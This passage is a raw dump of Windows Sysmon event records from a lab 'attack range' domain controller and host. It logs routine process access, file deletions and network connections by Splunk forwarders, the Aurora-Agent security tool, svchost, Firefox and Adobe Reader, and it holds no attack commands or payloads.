10341000x800000000000000048726Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048725Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048724Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048723Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048722Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048721Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:16.227{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000048761Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:17.930{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACB3186309A6212509BBA3271F17AFA4,SHA256=1026E7B258653F63BB05FBB17A325FB49843B4BF9EA312CAC98F567DA0941649,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000019003Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:16.033{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50205-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000019002Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:17.535{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2451301478D0AF97C3F4F1823DDBBCF,SHA256=1CAE1B446D07A1564103132090ECE6F181360B2D3351E884BFEDE9E8E13F356A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048762Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:18.981{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64C0295E4B092266A5370DC4EAC7747E,SHA256=BD8FB97464B5BC7B18C8DF3399D15B62DA1530604C6172E0096AF11C5CA9496D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000019004Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:18.648{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F1B504379F86D5B5AB847052A6C27A3,SHA256=620CBE1666BBEA8558475098D501133C333DCF2383FC78C56D75DB7F33DAD41C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019005Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:19.749{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCC0B424A1D2DF02614E53FECF5C7A51,SHA256=56BB722F39B111EA981A1B431EF547266963BC1A01DC69A460570AB1241A5A40,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000048764Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:19.707{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000048763Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:19.669{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage.sqlite-journalMD5=12F3B27F0699BA5F8A23D80588123531,SHA256=5ED5DA2E4C56777A1B19B3461DE64591FDA8022DC74D09FE411315165FACB2F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000019006Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:20.838{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F8917C4FECF9BA4570D8075E7629E7B,SHA256=738E270EB93B8D692CE90F87F39EF84B7F17641F8F7A3A9E8D130C0EA5D6C676,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048767Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:20.939{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json~RF3170bd.TMPMD5=CD9E020154CA9285B3D23527DEE980B5,SHA256=097DDD08BB2F7866A627B4D95D462BEAC9607DA4FDED3B8F70095785D118A3FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048766Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:20.339{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=65DB81A8EB1DC81C8CC124D9EDDE346A,SHA256=F57CA7AD939E2AD19222588BC4B3AEB749D61308FAAC7770FB0F87C8D298C836,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048765Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:20.038{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C688658A871FE05C3C1E9A5388286CE,SHA256=3836C250D9614AFC4DE3BCC41E00F49B850911AAEF8D50C8FDD1FE00394384D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000019007Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:21.941{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3822E1236529F4B7451C9513E2B8833,SHA256=9F85CD1A67086299B254C8BA03E247E79657A4C32BD06B72BD053D74D9F4FE78,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048770Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:19.870{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56523-false34.104.35.123123.35.104.34.bc.googleusercontent.com80http 354300x800000000000000048769Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:18.585{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56522-false10.0.1.12-8000- 23542300x800000000000000048768Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:21.123{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD7F6C60C5116DE4DA849C3225313239,SHA256=01A32DBB1DD14220B137DCDBF12855B9626FD8DF53499C051F5B0D6699412CA2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000048773Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:21.204{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-60470- 354300x800000000000000048772Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:21.179{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60470- 23542300x800000000000000048771Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:22.172{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5B88DA4534E739D197D045975DE8F85,SHA256=E4D3AA108FDD31529089B9A9DFD3346FD472FE375BFE5C640338DBCFA00D0E4E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000019038Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.863{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019037Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.860{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019036Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.859{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019035Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.855{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019034Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.853{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019033Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.853{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019032Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.851{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019031Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.848{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019030Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.847{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019029Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.845{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019028Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.844{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019027Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.838{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019026Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.835{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019025Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:22.834{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000019024Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 